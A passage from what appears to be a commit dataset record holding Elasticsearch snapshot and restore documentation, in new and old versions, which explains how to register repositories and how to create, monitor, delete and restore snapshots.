The snapshots themselves are left untouched and in place.\n\n[float]\n=== Restore\n\nA snapshot can be restored using the following command:\n\n[source,sh]\n-----------------------------------\nPOST \/_snapshot\/my_backup\/snapshot_1\/_restore\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nBy default, all indices in the snapshot are restored, and the cluster state is\n*not* restored. It's possible to select indices that should be restored as well\nas to allow the global cluster state to be restored by using the `indices` and\n`include_global_state` options in the restore request body. The list of indices\nsupports <<search-multi-index-type,multi index syntax>>. The `rename_pattern`\nand `rename_replacement` options can also be used to rename indices on restore\nusing a regular expression that supports referencing the original text, as\nexplained\nhttp:\/\/docs.oracle.com\/javase\/6\/docs\/api\/java\/util\/regex\/Matcher.html#appendReplacement(java.lang.StringBuffer,%20java.lang.String)[here].\nSet `include_aliases` to `false` to prevent aliases from being restored together\nwith associated indices:\n\n[source,js]\n-----------------------------------\nPOST \/_snapshot\/my_backup\/snapshot_1\/_restore\n{\n \"indices\": \"index_1,index_2\",\n \"ignore_unavailable\": true,\n \"include_global_state\": true,\n \"rename_pattern\": \"index_(.+)\",\n \"rename_replacement\": \"restored_index_$1\"\n}\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe restore operation can be performed on a functioning cluster. However, an\nexisting index can only be restored if it's <<indices-open-close,closed>> and\nhas the same number of shards as the index in the snapshot. The restore\noperation automatically opens restored indices if they were closed and creates\nnew indices if they didn't exist in the cluster. If cluster state is restored\nwith `include_global_state` (defaults to `false`), the restored templates that\ndon't currently exist in the cluster are added and existing templates with the\nsame name are replaced by the restored templates. The restored persistent\nsettings are added to the existing persistent settings.\n\n[float]\n==== Partial restore\n\nBy default, the entire restore operation will fail if one or more indices participating in the operation don't have\nsnapshots of all shards available. This can occur, for example, if some shards failed to snapshot. It is still possible to\nrestore such indices by setting `partial` to `true`. Please note that only successfully snapshotted shards will be\nrestored in this case and all missing shards will be recreated empty.\n\n\n[float]\n==== Changing index settings during restore\n\nMost index settings can be overridden during the restore process. For example, the following command will restore\nthe index `index_1` without creating any replicas while switching back to the default refresh interval:\n\n[source,js]\n-----------------------------------\nPOST \/_snapshot\/my_backup\/snapshot_1\/_restore\n{\n \"indices\": \"index_1\",\n \"index_settings\": {\n \"index.number_of_replicas\": 0\n },\n \"ignore_index_settings\": [\n \"index.refresh_interval\"\n ]\n}\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nPlease note that some settings such as `index.number_of_shards` cannot be changed during the restore operation.\n\n[float]\n==== Restoring to a different cluster\n\nThe information stored in a snapshot is not tied to a particular cluster or a cluster name. 
Therefore it's possible to\nrestore a snapshot made from one cluster into another cluster. All that is required is registering the repository\ncontaining the snapshot in the new cluster and starting the restore process. The new cluster doesn't have to have the\nsame size or topology. However, the version of the new cluster should be the same or newer (only 1 major version newer) than the cluster that was used to create the snapshot. For example, you can restore a 1.x snapshot to a 2.x cluster, but not a 1.x snapshot to a 5.x cluster.\n\nIf the new cluster is smaller, additional considerations apply. First of all, it's necessary to make sure\nthat the new cluster has enough capacity to store all indices in the snapshot. It's possible to change index settings\nduring restore to reduce the number of replicas, which can help with restoring snapshots into a smaller cluster. It's also\npossible to select only a subset of the indices using the `indices` parameter.\n\nIf indices in the original cluster were assigned to particular nodes using\n<<shard-allocation-filtering,shard allocation filtering>>, the same rules will be enforced in the new cluster. Therefore,\nif the new cluster doesn't contain nodes with appropriate attributes that a restored index can be allocated on, such\nan index will not be successfully restored unless these index allocation settings are changed during the restore operation.\n\nThe restore operation also checks that restored persistent settings are compatible with the current cluster to avoid accidentally\nrestoring incompatible settings such as `discovery.zen.minimum_master_nodes`, which could as a result disable a smaller cluster until the\nrequired number of master-eligible nodes is added. If you need to restore a snapshot with incompatible persistent settings, try\nrestoring it without the global cluster state.\n\n[float]\n=== Snapshot status\n\nA list of currently running snapshots with their detailed status information can be obtained using the following command:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/_status\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nIn this format, the command will return information about all currently running snapshots. By specifying a repository name, it's possible\nto limit the results to a particular repository:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/_status\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nIf both repository name and snapshot id are specified, this command will return detailed status information for the given snapshot even\nif it's not currently running:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\/_status\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nMultiple ids are also supported:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1,snapshot_2\/_status\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n[float]\n=== Monitoring snapshot\/restore progress\n\nThere are several ways to monitor the progress of the snapshot and restore processes while they are running. Both\noperations support the `wait_for_completion` parameter, which blocks the client until the operation is completed. 
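For example, the following request (the repository and snapshot names are placeholders) doesn't return until the restore has finished:\n\n[source,sh]\n-----------------------------------\nPOST \/_snapshot\/my_backup\/snapshot_1\/_restore?wait_for_completion=true\n-----------------------------------\n\n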
This is\nthe simplest method that can be used to get notified about operation completion.\n\nThe snapshot operation can also be monitored by periodic calls to the snapshot info:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nPlease note that the snapshot info operation uses the same resources and thread pool as the snapshot operation. So,\nexecuting a snapshot info operation while large shards are being snapshotted can cause the snapshot info operation to wait\nfor available resources before returning the result. On very large shards the wait time can be significant.\n\nTo get more immediate and complete information about snapshots, the snapshot status command can be used instead:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\/_status\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nWhile the snapshot info method returns only basic information about the snapshot in progress, the snapshot status returns a\ncomplete breakdown of the current state for each shard participating in the snapshot.\n\nThe restore process piggybacks on the standard recovery mechanism of Elasticsearch. As a result, standard recovery\nmonitoring services can be used to monitor the state of restore. When the restore operation is executed, the cluster\ntypically goes into the `red` state. This happens because the restore operation starts with \"recovering\" primary shards of the\nrestored indices. During this operation the primary shards become unavailable, which manifests itself in the `red` cluster\nstate. Once recovery of the primary shards is completed, Elasticsearch switches to the standard replication process and\ncreates the required number of replicas; at this moment the cluster switches to the `yellow` state. Once all required replicas\nare created, the cluster switches to the `green` state.\n\nThe cluster health operation provides only a high-level status of the restore process. It's possible to get more\ndetailed insight into the current state of the recovery process by using the <<indices-recovery, indices recovery>> and\n<<cat-recovery, cat recovery>> APIs.\n\n[float]\n=== Stopping currently running snapshot and restore operations\n\nThe snapshot and restore framework allows running only one snapshot or one restore operation at a time. If a currently\nrunning snapshot was executed by mistake, or takes unusually long, it can be terminated using the snapshot delete operation.\nThe snapshot delete operation checks whether the deleted snapshot is currently running and, if it is, stops\nthat snapshot before deleting the snapshot data from the repository.\n\n[source,sh]\n-----------------------------------\nDELETE \/_snapshot\/my_backup\/snapshot_1\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe restore operation uses the standard shard recovery mechanism. Therefore, any currently running restore operation can\nbe canceled by deleting indices that are being restored. Please note that data for all deleted indices will be removed\nfrom the cluster as a result of this operation.\n\n[float]\n=== Effect of cluster blocks on snapshot and restore operations\nMany snapshot and restore operations are affected by cluster and index blocks. For example, registering and unregistering\nrepositories require write global metadata access. 
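For instance, while a cluster-wide read-only block like the one sketched below is in place, attempts to register or delete a repository will be rejected (remember to set the block back to `false` afterwards):\n\n[source,js]\n-----------------------------------\nPUT \/_cluster\/settings\n{\n  \"persistent\": {\n    \"cluster.blocks.read_only\": true\n  }\n}\n-----------------------------------\n\n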
The snapshot operation requires that all indices and their metadata as\nwell as the global metadata be readable. The restore operation requires the global metadata to be writable; however,\nthe index level blocks are ignored during restore because indices are essentially recreated during restore.\nPlease note that repository content is not part of the cluster and therefore cluster blocks don't affect internal\nrepository operations such as listing or deleting snapshots from an already registered repository.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"64bc5331bed562257e08b0599df7de59151f6f60","subject":"[Docs] Correct setting name in snapshot\/restore documentation (#22023)","message":"[Docs] Correct setting name in snapshot\/restore documentation (#22023)\n\nThere is no setting include_cluster_state for snapshot restore. The correct name for this setting is include_global_state.","repos":"strapdata\/elassandra5-rc,strapdata\/elassandra5-rc,strapdata\/elassandra5-rc,strapdata\/elassandra5-rc,strapdata\/elassandra5-rc","old_file":"docs\/reference\/modules\/snapshots.asciidoc","new_file":"docs\/reference\/modules\/snapshots.asciidoc","new_contents":"[[modules-snapshots]]\n== Snapshot And Restore\n\nThe snapshot and restore module allows you to create snapshots of individual\nindices or of an entire cluster into a remote repository like a shared file system,\nS3, or HDFS. These snapshots are great for backups because they can be restored\nrelatively quickly but they are not archival because they can only be restored\nto versions of Elasticsearch that can read the index. That means that:\n\n* A snapshot of an index created in 2.x can be restored to 5.x.\n* A snapshot of an index created in 1.x can be restored to 2.x.\n* A snapshot of an index created in 1.x can **not** be restored to 5.x.\n\nTo restore a snapshot of an index created in 1.x to 5.x you can restore it to\na 2.x cluster and use <<reindex-from-remote,reindex-from-remote>> to rebuild\nthe index in a 5.x cluster. This is as time-consuming as restoring from\narchival copies of the original data.\n\n[float]\n=== Repositories\n\nBefore any snapshot or restore operation can be performed, a snapshot repository should be registered in\nElasticsearch. The repository settings are repository-type specific. See below for details.\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_backup\n{\n \"type\": \"fs\",\n \"settings\": {\n ... repository specific settings ...\n }\n}\n-----------------------------------\n\nOnce a repository is registered, its information can be obtained using the following command:\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\/my_backup\n-----------------------------------\n\/\/ CONSOLE\n\nwhich returns:\n\n[source,js]\n-----------------------------------\n{\n \"my_backup\": {\n \"type\": \"fs\",\n \"settings\": {\n \"compress\": true,\n \"location\": \"\/mount\/backups\/my_backup\"\n }\n }\n}\n-----------------------------------\n\nInformation about multiple repositories can be fetched in one go by using a comma-delimited list of repository names.\nStar wildcards are supported as well. 
For example, information about repositories that start with `repo` or that contain `backup`\ncan be obtained using the following command:\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\/repo*,*backup*\n-----------------------------------\n\nIf a repository name is not specified, or `_all` is used as repository name Elasticsearch will return information about\nall repositories currently registered in the cluster:\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\n-----------------------------------\n\nor\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\/_all\n-----------------------------------\n\n[float]\n===== Shared File System Repository\n\nThe shared file system repository (`\"type\": \"fs\"`) uses the shared file system to store snapshots. In order to register\nthe shared file system repository it is necessary to mount the same shared filesystem to the same location on all\nmaster and data nodes. This location (or one of its parent directories) must be registered in the `path.repo`\nsetting on all master and data nodes.\n\nAssuming that the shared filesystem is mounted to `\/mount\/backups\/my_backup`, the following setting should be added to\n`elasticsearch.yml` file:\n\n[source,yaml]\n--------------\npath.repo: [\"\/mount\/backups\", \"\/mount\/longterm_backups\"]\n--------------\n\nThe `path.repo` setting supports Microsoft Windows UNC paths as long as at least server name and share are specified as\na prefix and back slashes are properly escaped:\n\n[source,yaml]\n--------------\npath.repo: [\"\\\\\\\\MY_SERVER\\\\Snapshots\"]\n--------------\n\nAfter all nodes are restarted, the following command can be used to register the shared file system repository with\nthe name `my_backup`:\n\n[source,js]\n-----------------------------------\n$ curl -XPUT 'http:\/\/localhost:9200\/_snapshot\/my_backup' -d '{\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"\/mount\/backups\/my_backup\",\n \"compress\": true\n }\n}'\n-----------------------------------\n\nIf the repository location is specified as a relative path this path will be resolved against the first path specified\nin `path.repo`:\n\n[source,js]\n-----------------------------------\n$ curl -XPUT 'http:\/\/localhost:9200\/_snapshot\/my_backup' -d '{\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"my_backup\",\n \"compress\": true\n }\n}'\n-----------------------------------\n\nThe following settings are supported:\n\n[horizontal]\n`location`:: Location of the snapshots. Mandatory.\n`compress`:: Turns on compression of the snapshot files. Compression is applied only to metadata files (index mapping and settings). Data files are not compressed. Defaults to `true`.\n`chunk_size`:: Big files can be broken down into chunks during snapshotting if needed. The chunk size can be specified in bytes or by\n using size value notation, i.e. 1g, 10m, 5k. Defaults to `null` (unlimited chunk size).\n`max_restore_bytes_per_sec`:: Throttles per node restore rate. Defaults to `40mb` per second.\n`max_snapshot_bytes_per_sec`:: Throttles per node snapshot rate. Defaults to `40mb` per second.\n`readonly`:: Makes repository read-only. Defaults to `false`.\n\n[float]\n===== Read-only URL Repository\n\nThe URL repository (`\"type\": \"url\"`) can be used as an alternative read-only way to access data created by the shared file\nsystem repository. 
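For example, such a repository could be registered as follows (the repository name and URL are illustrative placeholders):\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_read_only_url_repository\n{\n  \"type\": \"url\",\n  \"settings\": {\n    \"url\": \"file:\/mount\/backups\/my_backup\"\n  }\n}\n-----------------------------------\n\n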
The URL specified in the `url` parameter should point to the root of the shared filesystem repository.\nThe following settings are supported:\n\n[horizontal]\n`url`:: Location of the snapshots. Mandatory.\n\nThe URL repository supports the following protocols: \"http\", \"https\", \"ftp\", \"file\" and \"jar\". URL repositories with `http:`,\n`https:`, and `ftp:` URLs have to be whitelisted by specifying allowed URLs in the `repositories.url.allowed_urls` setting.\nThis setting supports wildcards in the place of host, path, query, and fragment. For example:\n\n[source,yaml]\n-----------------------------------\nrepositories.url.allowed_urls: [\"http:\/\/www.example.org\/root\/*\", \"https:\/\/*.mydomain.com\/*?*#*\"]\n-----------------------------------\n\nURL repositories with `file:` URLs can only point to locations registered in the `path.repo` setting, similar to\nthe shared file system repository.\n\n[float]\n===== Repository plugins\n\nOther repository backends are available in these official plugins:\n\n* {plugins}\/repository-s3.html[repository-s3] for S3 repository support\n* {plugins}\/repository-hdfs.html[repository-hdfs] for HDFS repository support in Hadoop environments\n* {plugins}\/repository-azure.html[repository-azure] for Azure storage repositories\n* {plugins}\/repository-gcs.html[repository-gcs] for Google Cloud Storage repositories\n\n[float]\n===== Repository Verification\nWhen a repository is registered, it's immediately verified on all master and data nodes to make sure that it is functional\non all nodes currently present in the cluster. The `verify` parameter can be used to explicitly disable the repository\nverification when registering or updating a repository:\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/s3_repository?verify=false\n{\n \"type\": \"s3\",\n \"settings\": {\n \"bucket\": \"my_s3_bucket\",\n \"region\": \"eu-west-1\"\n }\n}\n-----------------------------------\n\/\/ CONSOLE\n\nThe verification process can also be executed manually by running the following command:\n\n[source,js]\n-----------------------------------\nPOST \/_snapshot\/s3_repository\/_verify\n-----------------------------------\n\/\/ CONSOLE\n\nIt returns a list of nodes where the repository was successfully verified, or an error message if the verification process failed.\n\n[float]\n=== Snapshot\n\nA repository can contain multiple snapshots of the same cluster. Snapshots are identified by unique names within the\ncluster. A snapshot with the name `snapshot_1` in the repository `my_backup` can be created by executing the following\ncommand:\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_backup\/snapshot_1?wait_for_completion=true\n-----------------------------------\n\/\/ CONSOLE\n\nThe `wait_for_completion` parameter specifies whether or not the request should return immediately after snapshot\ninitialization (default) or wait for snapshot completion. During snapshot initialization, information about all\nprevious snapshots is loaded into memory, which means that in large repositories it may take several seconds (or\neven minutes) for this command to return even if the `wait_for_completion` parameter is set to `false`.\n\nBy default, a snapshot of all open and started indices in the cluster is created. 
This behavior can be changed by\nspecifying the list of indices in the body of the snapshot request.\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_backup\/snapshot_1\n{\n \"indices\": \"index_1,index_2\",\n \"ignore_unavailable\": true,\n \"include_global_state\": false\n}\n-----------------------------------\n\/\/ CONSOLE\n\nThe list of indices that should be included in the snapshot can be specified using the `indices` parameter that\nsupports <<search-multi-index-type,multi index syntax>>. The snapshot request also supports the\n`ignore_unavailable` option. Setting it to `true` will cause indices that do not exist to be ignored during snapshot\ncreation. By default, when the `ignore_unavailable` option is not set and an index is missing, the snapshot request will fail.\nBy setting `include_global_state` to false it's possible to prevent the cluster global state from being stored as part of\nthe snapshot. By default, the entire snapshot will fail if one or more indices participating in the snapshot don't have\nall primary shards available. This behaviour can be changed by setting `partial` to `true`.\n\nThe index snapshot process is incremental. In the process of making the index snapshot Elasticsearch analyses\nthe list of the index files that are already stored in the repository and copies only files that were created or\nchanged since the last snapshot. That allows multiple snapshots to be preserved in the repository in a compact form.\nThe snapshotting process is executed in a non-blocking fashion. All indexing and searching operations can continue to be\nexecuted against the index that is being snapshotted. However, a snapshot represents the point-in-time view of the index\nat the moment when the snapshot was created, so no records that were added to the index after the snapshot process was started\nwill be present in the snapshot. The snapshot process starts immediately for the primary shards that have been started\nand are not relocating at the moment. Before version 1.2.0, the snapshot operation fails if the cluster has any relocating or\ninitializing primaries of indices participating in the snapshot. Starting with version 1.2.0, Elasticsearch waits for\nrelocation or initialization of shards to complete before snapshotting them.\n\nBesides creating a copy of each index, the snapshot process can also store global cluster metadata, which includes persistent\ncluster settings and templates. The transient settings and registered snapshot repositories are not stored as part of\nthe snapshot.\n\nOnly one snapshot process can be executed in the cluster at any time. While the snapshot of a particular shard is being\ncreated, this shard cannot be moved to another node, which can interfere with the rebalancing process and allocation\nfiltering. 
Elasticsearch will only be able to move a shard to another node (according to the current allocation\nfiltering settings and rebalancing algorithm) once the snapshot is finished.\n\nOnce a snapshot is created, information about this snapshot can be obtained using the following command:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\n-----------------------------------\n\/\/ CONSOLE\n\nAs with repositories, information about multiple snapshots can be queried in one go, supporting wildcards as well:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_*,some_other_snapshot\n-----------------------------------\n\/\/ CONSOLE\n\nAll snapshots currently stored in the repository can be listed using the following command:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/_all\n-----------------------------------\n\/\/ CONSOLE\n\nThe command fails if some of the snapshots are unavailable. The boolean parameter `ignore_unavailable` can be used to\nreturn all snapshots that are currently available.\n\nA currently running snapshot can be retrieved using the following command:\n\n[source,sh]\n-----------------------------------\n$ curl -XGET \"localhost:9200\/_snapshot\/my_backup\/_current\"\n-----------------------------------\n\nA snapshot can be deleted from the repository using the following command:\n\n[source,sh]\n-----------------------------------\nDELETE \/_snapshot\/my_backup\/snapshot_1\n-----------------------------------\n\/\/ CONSOLE\n\nWhen a snapshot is deleted from a repository, Elasticsearch deletes all files that are associated with the deleted\nsnapshot and not used by any other snapshots. If the delete snapshot operation is executed while the snapshot is being\ncreated, the snapshotting process will be aborted and all files created as part of the snapshotting process will be\ncleaned up. Therefore, the delete snapshot operation can be used to cancel long-running snapshot operations that were\nstarted by mistake.\n\nA repository can be deleted using the following command:\n\n[source,sh]\n-----------------------------------\nDELETE \/_snapshot\/my_backup\n-----------------------------------\n\/\/ CONSOLE\n\nWhen a repository is deleted, Elasticsearch only removes the reference to the location where the repository is storing\nthe snapshots. The snapshots themselves are left untouched and in place.\n\n[float]\n=== Restore\n\nA snapshot can be restored using the following command:\n\n[source,sh]\n-----------------------------------\nPOST \/_snapshot\/my_backup\/snapshot_1\/_restore\n-----------------------------------\n\/\/ CONSOLE\n\nBy default, all indices in the snapshot are restored, and the cluster state is\n*not* restored. It's possible to select indices that should be restored as well\nas to allow the global cluster state to be restored by using the `indices` and\n`include_global_state` options in the restore request body. The list of indices\nsupports <<search-multi-index-type,multi index syntax>>. 
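For example, wildcard patterns and exclusions can be combined in the `indices` value, as in this illustrative sketch:\n\n[source,js]\n-----------------------------------\nPOST \/_snapshot\/my_backup\/snapshot_1\/_restore\n{\n  \"indices\": \"index_*,-index_3\"\n}\n-----------------------------------\n\n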
The `rename_pattern`\nand `rename_replacement` options can also be used to rename indices on restore\nusing a regular expression that supports referencing the original text, as\nexplained\nhttp:\/\/docs.oracle.com\/javase\/6\/docs\/api\/java\/util\/regex\/Matcher.html#appendReplacement(java.lang.StringBuffer,%20java.lang.String)[here].\nSet `include_aliases` to `false` to prevent aliases from being restored together\nwith associated indices:\n\n[source,js]\n-----------------------------------\nPOST \/_snapshot\/my_backup\/snapshot_1\/_restore\n{\n \"indices\": \"index_1,index_2\",\n \"ignore_unavailable\": true,\n \"include_global_state\": true,\n \"rename_pattern\": \"index_(.+)\",\n \"rename_replacement\": \"restored_index_$1\"\n}\n-----------------------------------\n\/\/ CONSOLE\n\nThe restore operation can be performed on a functioning cluster. However, an\nexisting index can only be restored if it's <<indices-open-close,closed>> and\nhas the same number of shards as the index in the snapshot. The restore\noperation automatically opens restored indices if they were closed and creates\nnew indices if they didn't exist in the cluster. If cluster state is restored\nwith `include_global_state` (defaults to `false`), the restored templates that\ndon't currently exist in the cluster are added and existing templates with the\nsame name are replaced by the restored templates. The restored persistent\nsettings are added to the existing persistent settings.\n\n[float]\n==== Partial restore\n\nBy default, the entire restore operation will fail if one or more indices participating in the operation don't have\nsnapshots of all shards available. This can occur, for example, if some shards failed to snapshot. It is still possible to\nrestore such indices by setting `partial` to `true`. Please note that only successfully snapshotted shards will be\nrestored in this case and all missing shards will be recreated empty.\n\n\n[float]\n==== Changing index settings during restore\n\nMost index settings can be overridden during the restore process. For example, the following command will restore\nthe index `index_1` without creating any replicas while switching back to the default refresh interval:\n\n[source,js]\n-----------------------------------\nPOST \/_snapshot\/my_backup\/snapshot_1\/_restore\n{\n \"indices\": \"index_1\",\n \"index_settings\": {\n \"index.number_of_replicas\": 0\n },\n \"ignore_index_settings\": [\n \"index.refresh_interval\"\n ]\n}\n-----------------------------------\n\/\/ CONSOLE\n\nPlease note that some settings such as `index.number_of_shards` cannot be changed during the restore operation.\n\n[float]\n==== Restoring to a different cluster\n\nThe information stored in a snapshot is not tied to a particular cluster or a cluster name. Therefore it's possible to\nrestore a snapshot made from one cluster into another cluster. All that is required is registering the repository\ncontaining the snapshot in the new cluster and starting the restore process. The new cluster doesn't have to have the\nsame size or topology. However, the version of the new cluster should be the same or newer (only 1 major version newer) than the cluster that was used to create the snapshot. For example, you can restore a 1.x snapshot to a 2.x cluster, but not a 1.x snapshot to a 5.x cluster.\n\nIf the new cluster is smaller, additional considerations apply. First of all, it's necessary to make sure\nthat the new cluster has enough capacity to store all indices in the snapshot. 
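One way to fit a snapshot into a smaller cluster, sketched below with placeholder names, is to restore only some of the indices and drop their replicas:\n\n[source,js]\n-----------------------------------\nPOST \/_snapshot\/my_backup\/snapshot_1\/_restore\n{\n  \"indices\": \"index_1\",\n  \"index_settings\": {\n    \"index.number_of_replicas\": 0\n  }\n}\n-----------------------------------\n\n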
It's possible to change index settings\nduring restore to reduce the number of replicas, which can help with restoring snapshots into a smaller cluster. It's also\npossible to select only a subset of the indices using the `indices` parameter. Prior to version 1.5.0, Elasticsearch\ndidn't check restored persistent settings, making it possible to accidentally restore an incompatible\n`discovery.zen.minimum_master_nodes` setting, and as a result disable a smaller cluster until the required number of\nmaster-eligible nodes is added. Starting with version 1.5.0, incompatible settings are ignored.\n\nIf indices in the original cluster were assigned to particular nodes using\n<<shard-allocation-filtering,shard allocation filtering>>, the same rules will be enforced in the new cluster. Therefore,\nif the new cluster doesn't contain nodes with appropriate attributes that a restored index can be allocated on, such\nan index will not be successfully restored unless these index allocation settings are changed during the restore operation.\n\n[float]\n=== Snapshot status\n\nA list of currently running snapshots with their detailed status information can be obtained using the following command:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/_status\n-----------------------------------\n\/\/ CONSOLE\n\nIn this format, the command will return information about all currently running snapshots. By specifying a repository name, it's possible\nto limit the results to a particular repository:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/_status\n-----------------------------------\n\/\/ CONSOLE\n\nIf both repository name and snapshot id are specified, this command will return detailed status information for the given snapshot even\nif it's not currently running:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\/_status\n-----------------------------------\n\/\/ CONSOLE\n\nMultiple ids are also supported:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1,snapshot_2\/_status\n-----------------------------------\n\/\/ CONSOLE\n\n[float]\n=== Monitoring snapshot\/restore progress\n\nThere are several ways to monitor the progress of the snapshot and restore processes while they are running. Both\noperations support the `wait_for_completion` parameter, which blocks the client until the operation is completed. This is\nthe simplest method that can be used to get notified about operation completion.\n\nThe snapshot operation can also be monitored by periodic calls to the snapshot info:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\n-----------------------------------\n\/\/ CONSOLE\n\nPlease note that the snapshot info operation uses the same resources and thread pool as the snapshot operation. So,\nexecuting a snapshot info operation while large shards are being snapshotted can cause the snapshot info operation to wait\nfor available resources before returning the result. 
On very large shards the wait time can be significant.\n\nTo get more immediate and complete information about snapshots, the snapshot status command can be used instead:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\/_status\n-----------------------------------\n\/\/ CONSOLE\n\nWhile the snapshot info method returns only basic information about the snapshot in progress, the snapshot status returns a\ncomplete breakdown of the current state for each shard participating in the snapshot.\n\nThe restore process piggybacks on the standard recovery mechanism of Elasticsearch. As a result, standard recovery\nmonitoring services can be used to monitor the state of restore. When the restore operation is executed, the cluster\ntypically goes into the `red` state. This happens because the restore operation starts with \"recovering\" primary shards of the\nrestored indices. During this operation the primary shards become unavailable, which manifests itself in the `red` cluster\nstate. Once recovery of the primary shards is completed, Elasticsearch switches to the standard replication process and\ncreates the required number of replicas; at this moment the cluster switches to the `yellow` state. Once all required replicas\nare created, the cluster switches to the `green` state.\n\nThe cluster health operation provides only a high-level status of the restore process. It's possible to get more\ndetailed insight into the current state of the recovery process by using the <<indices-recovery, indices recovery>> and\n<<cat-recovery, cat recovery>> APIs.\n\n[float]\n=== Stopping currently running snapshot and restore operations\n\nThe snapshot and restore framework allows running only one snapshot or one restore operation at a time. If a currently\nrunning snapshot was executed by mistake, or takes unusually long, it can be terminated using the snapshot delete operation.\nThe snapshot delete operation checks whether the deleted snapshot is currently running and, if it is, stops\nthat snapshot before deleting the snapshot data from the repository.\n\n[source,sh]\n-----------------------------------\nDELETE \/_snapshot\/my_backup\/snapshot_1\n-----------------------------------\n\/\/ CONSOLE\n\nThe restore operation uses the standard shard recovery mechanism. Therefore, any currently running restore operation can\nbe canceled by deleting indices that are being restored. Please note that data for all deleted indices will be removed\nfrom the cluster as a result of this operation.\n\n[float]\n=== Effect of cluster blocks on snapshot and restore operations\nMany snapshot and restore operations are affected by cluster and index blocks. For example, registering and unregistering\nrepositories require write global metadata access. The snapshot operation requires that all indices and their metadata as\nwell as the global metadata be readable. The restore operation requires the global metadata to be writable; however,\nthe index level blocks are ignored during restore because indices are essentially recreated during restore.\nPlease note that repository content is not part of the cluster and therefore cluster blocks don't affect internal\nrepository operations such as listing or deleting snapshots from an already registered repository.\n","old_contents":"[[modules-snapshots]]\n== Snapshot And Restore\n\nThe snapshot and restore module allows to create snapshots of individual\nindices or an entire cluster into a remote repository like shared file system,\nS3, or HDFS. 
These snapshots are great for backups because they can be restored\nrelatively quickly but they are not archival because they can only be restored\nto versions of Elasticsearch that can read the index. That means that:\n\n* A snapshot of an index created in 2.x can be restored to 5.x.\n* A snapshot of an index created in 1.x can be restored to 2.x.\n* A snapshot of an index created in 1.x can **not** be restored to 5.x.\n\nTo restore a snapshot of an index created in 1.x to 5.x you can restore it to\na 2.x cluster and use <<reindex-from-remote,reindex-from-remote>> to rebuild\nthe index in a 5.x cluster. This is as time consuming as restoring from\narchival copies of the original data.\n\n[float]\n=== Repositories\n\nBefore any snapshot or restore operation can be performed, a snapshot repository should be registered in\nElasticsearch. The repository settings are repository-type specific. See below for details.\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_backup\n{\n \"type\": \"fs\",\n \"settings\": {\n ... repository specific settings ...\n }\n}\n-----------------------------------\n\nOnce a repository is registered, its information can be obtained using the following command:\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\/my_backup\n-----------------------------------\n\/\/ CONSOLE\n\nwhich returns:\n\n[source,js]\n-----------------------------------\n{\n \"my_backup\": {\n \"type\": \"fs\",\n \"settings\": {\n \"compress\": true,\n \"location\": \"\/mount\/backups\/my_backup\"\n }\n }\n}\n-----------------------------------\n\nInformation about multiple repositories can be fetched in one go by using a comma-delimited list of repository names.\nStar wildcards are supported as well. For example, information about repositories that start with `repo` or that contain `backup`\ncan be obtained using the following command:\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\/repo*,*backup*\n-----------------------------------\n\nIf a repository name is not specified, or `_all` is used as repository name Elasticsearch will return information about\nall repositories currently registered in the cluster:\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\n-----------------------------------\n\nor\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\/_all\n-----------------------------------\n\n[float]\n===== Shared File System Repository\n\nThe shared file system repository (`\"type\": \"fs\"`) uses the shared file system to store snapshots. In order to register\nthe shared file system repository it is necessary to mount the same shared filesystem to the same location on all\nmaster and data nodes. 
